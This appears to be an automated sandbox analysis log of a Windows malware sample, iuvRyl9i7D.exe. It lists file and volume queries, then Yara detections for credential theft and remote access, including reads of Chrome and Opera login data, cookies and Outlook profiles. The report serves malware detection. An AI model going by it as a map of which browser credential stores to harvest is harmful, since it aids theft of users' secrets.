Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

Remote Access Functionality

Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY